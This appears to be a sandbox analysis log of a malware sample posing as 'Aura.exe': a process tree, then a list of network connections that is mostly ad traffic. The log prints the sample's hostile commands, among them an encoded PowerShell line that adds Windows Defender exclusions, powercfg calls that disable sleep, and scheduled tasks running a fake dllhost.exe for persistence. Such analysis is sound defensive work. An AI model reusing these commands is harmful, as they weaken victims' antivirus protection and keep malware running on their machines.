"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4764 /prefetch:2

C:\Users\Admin\Downloads\Aura\Aura\Aura.exe

"C:\Users\Admin\Downloads\Aura\Aura\Aura.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5176 -ip 5176

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 308

C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe

"C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p1404753551733818025492326517 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAE0AdwBSAEQAOAA2ADMATQBCACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABZAGEAOABKAE4AcQBIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEgAaQBzAEMAVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AFQAMQBDAFIAOABjADYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAE0AdwBSAEQAOAA2ADMATQBCACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABZAGEAOABKAE4AcQBIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEgAaQBzAEMAVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AFQAMQBDAFIAOABjADYAIwA+AA=="

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3605" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3605" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.mediafire.com udp
US 104.16.114.74:443 www.mediafire.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 74.114.16.104.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 static.mediafire.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 13.107.21.237:443 g.bing.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.179.234:443 ajax.googleapis.com tcp
US 8.8.8.8:53 cdn.amplitude.com udp
GB 18.154.84.60:443 cdn.amplitude.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 api.amplitude.com udp
US 35.82.163.160:443 api.amplitude.com tcp
US 8.8.8.8:53 region1.analytics.google.com udp
US 216.239.34.36:443 region1.analytics.google.com tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
BE 74.125.71.155:443 stats.g.doubleclick.net tcp
GB 172.217.16.227:443 www.google.co.uk tcp
US 8.8.8.8:53 72.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 60.84.154.18.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 107.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 160.163.82.35.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
BE 74.125.71.155:443 stats.g.doubleclick.net udp
GB 142.250.180.4:443 www.google.com udp
GB 172.217.16.227:443 www.google.co.uk udp
US 8.8.8.8:53 155.71.125.74.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 216.239.34.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 216.239.34.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 connect.facebook.net udp
IT 157.240.203.2:443 connect.facebook.net tcp
US 8.8.8.8:53 translate.google.com udp
GB 172.217.169.78:443 translate.google.com tcp
US 8.8.8.8:53 2.203.240.157.in-addr.arpa udp
US 8.8.8.8:53 translate.googleapis.com udp
GB 216.58.201.106:443 translate.googleapis.com tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
GB 163.70.147.35:443 www.facebook.com tcp
US 8.8.8.8:53 translate-pa.googleapis.com udp
US 8.8.8.8:53 35.147.70.163.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.179.234:443 translate-pa.googleapis.com udp
GB 216.58.201.106:443 translate-pa.googleapis.com udp
US 8.8.8.8:53 the.gatekeeperconsent.com udp
US 8.8.8.8:53 btloader.com udp
US 104.21.42.32:443 the.gatekeeperconsent.com tcp
US 104.22.74.216:443 btloader.com tcp
US 8.8.8.8:53 www.ezojs.com udp
US 104.21.63.106:443 www.ezojs.com tcp
US 8.8.8.8:53 privacy.gatekeeperconsent.com udp
GB 172.217.169.78:443 translate.google.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 172.67.199.186:443 privacy.gatekeeperconsent.com tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 api.btloader.com udp
US 130.211.23.194:443 api.btloader.com tcp
US 8.8.8.8:53 ad-delivery.net udp
US 104.26.3.70:443 ad-delivery.net tcp
US 104.26.3.70:443 ad-delivery.net tcp
US 8.8.8.8:53 cdn.otnolatrnup.com udp
US 104.16.52.110:443 cdn.otnolatrnup.com tcp
US 8.8.8.8:53 g.ezoic.net udp
FR 35.181.89.222:443 g.ezoic.net tcp
US 8.8.8.8:53 www.mediafiredls.com udp
US 8.8.8.8:53 go.ezodn.com udp
US 130.211.23.194:443 api.btloader.com udp
US 8.8.8.8:53 32.42.21.104.in-addr.arpa udp
US 8.8.8.8:53 216.74.22.104.in-addr.arpa udp
US 8.8.8.8:53 106.63.21.104.in-addr.arpa udp
US 8.8.8.8:53 73.79.16.104.in-addr.arpa udp
US 8.8.8.8:53 186.199.67.172.in-addr.arpa udp
US 8.8.8.8:53 194.23.211.130.in-addr.arpa udp
US 8.8.8.8:53 102.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 70.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 222.89.181.35.in-addr.arpa udp
US 8.8.8.8:53 110.52.16.104.in-addr.arpa udp
US 172.67.73.78:443 www.mediafiredls.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 8.8.8.8:53 otnolatrnup.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 g.ezodn.com udp
GB 172.217.169.34:443 securepubads.g.doubleclick.net tcp
US 8.8.8.8:53 bshr.ezodn.com udp
US 104.21.87.79:443 bshr.ezodn.com tcp
US 8.8.8.8:53 tags.crwdcntrl.net udp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 ad.crwdcntrl.net udp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
GB 172.217.169.34:443 securepubads.g.doubleclick.net udp
GB 18.245.143.118:443 tags.crwdcntrl.net tcp
IE 52.50.240.62:443 bcp.crwdcntrl.net tcp
IE 54.72.120.129:443 bcp.crwdcntrl.net tcp
US 8.8.8.8:53 78.73.67.172.in-addr.arpa udp
US 8.8.8.8:53 121.142.67.172.in-addr.arpa udp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 34.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 66.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 79.87.21.104.in-addr.arpa udp
US 8.8.8.8:53 118.143.245.18.in-addr.arpa udp
US 8.8.8.8:53 62.240.50.52.in-addr.arpa udp
US 8.8.8.8:53 129.120.72.54.in-addr.arpa udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
FR 35.181.89.222:443 g.ezoic.net tcp
GB 216.58.204.66:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 id.a-mx.com udp
US 8.8.8.8:53 gum.criteo.com udp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 id.hadron.ad.gt udp
US 8.8.8.8:53 ups.analytics.yahoo.com udp
US 8.8.8.8:53 api.rlcdn.com udp
US 8.8.8.8:53 id.crwdcntrl.net udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 cdn.id5-sync.com udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 cdn.prod.uidapi.com udp
US 8.8.8.8:53 invstatic101.creativecdn.com udp
US 8.8.8.8:53 cdn-ima.33across.com udp
NL 79.127.227.46:443 id.a-mx.com tcp
NL 178.250.1.11:443 gum.criteo.com tcp
DE 162.19.138.116:443 id5-sync.com tcp
US 104.22.5.69:443 id.hadron.ad.gt tcp
DE 3.75.62.37:443 ups.analytics.yahoo.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 34.102.146.192:443 oa.openxcdn.net tcp
US 34.120.133.55:443 api.rlcdn.com tcp
US 34.96.70.87:443 invstatic101.creativecdn.com tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 172.67.38.106:443 cdn.id5-sync.com tcp
GB 18.245.255.11:443 cdn.prod.uidapi.com tcp
NL 178.250.1.3:443 static.criteo.net tcp
US 104.18.35.167:443 cdn-ima.33across.com tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 142.250.178.1:443 tpc.googlesyndication.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 oajs.openx.net udp
GB 88.221.134.137:80 apps.identrust.com tcp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
GB 88.221.134.137:80 apps.identrust.com tcp
US 8.8.8.8:53 dnacdn.net udp
US 34.120.135.53:443 oajs.openx.net tcp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
NL 178.250.1.11:443 dnacdn.net tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
DE 3.122.80.51:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 85c486937def8a0fa343f0c760af3bcd.safeframe.googlesyndication.com udp
DE 3.122.80.51:443 btlr.sharethrough.com tcp
DE 3.122.80.51:443 btlr.sharethrough.com tcp
DE 3.122.80.51:443 btlr.sharethrough.com tcp
DE 3.122.80.51:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 htlb.casalemedia.com udp
US 8.8.8.8:53 ghb.adtelligent.com udp
US 8.8.8.8:53 hb-api.omnitagjs.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 8.8.8.8:53 prebid.smilewanted.com udp
US 8.8.8.8:53 hb.yellowblue.io udp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 prebid.a-mo.net udp
US 172.64.151.101:443 htlb.casalemedia.com tcp
GB 142.250.178.1:443 tpc.googlesyndication.com udp
US 23.227.151.194:443 ghb.adtelligent.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
GB 108.138.217.66:443 hb.yellowblue.io tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
GB 142.250.180.1:443 85c486937def8a0fa343f0c760af3bcd.safeframe.googlesyndication.com tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
DE 51.89.9.252:443 onetag-sys.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
US 34.120.135.53:443 oajs.openx.net udp
US 8.8.8.8:53 46.227.127.79.in-addr.arpa udp
US 8.8.8.8:53 11.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 69.5.22.104.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 192.146.102.34.in-addr.arpa udp
US 8.8.8.8:53 55.133.120.34.in-addr.arpa udp
DE 51.89.9.252:443 onetag-sys.com udp
US 8.8.8.8:53 87.70.96.34.in-addr.arpa udp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 116.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 106.38.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.255.245.18.in-addr.arpa udp
US 8.8.8.8:53 37.62.75.3.in-addr.arpa udp
US 8.8.8.8:53 167.35.18.104.in-addr.arpa udp
US 8.8.8.8:53 3.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 1.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 137.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 53.135.120.34.in-addr.arpa udp
US 8.8.8.8:53 120.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 51.80.122.3.in-addr.arpa udp
US 8.8.8.8:53 101.151.64.172.in-addr.arpa udp
US 8.8.8.8:53 209.31.22.104.in-addr.arpa udp
US 8.8.8.8:53 77.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 66.217.138.108.in-addr.arpa udp
US 8.8.8.8:53 158.84.75.147.in-addr.arpa udp
US 8.8.8.8:53 252.9.89.51.in-addr.arpa udp
US 8.8.8.8:53 194.151.227.23.in-addr.arpa udp
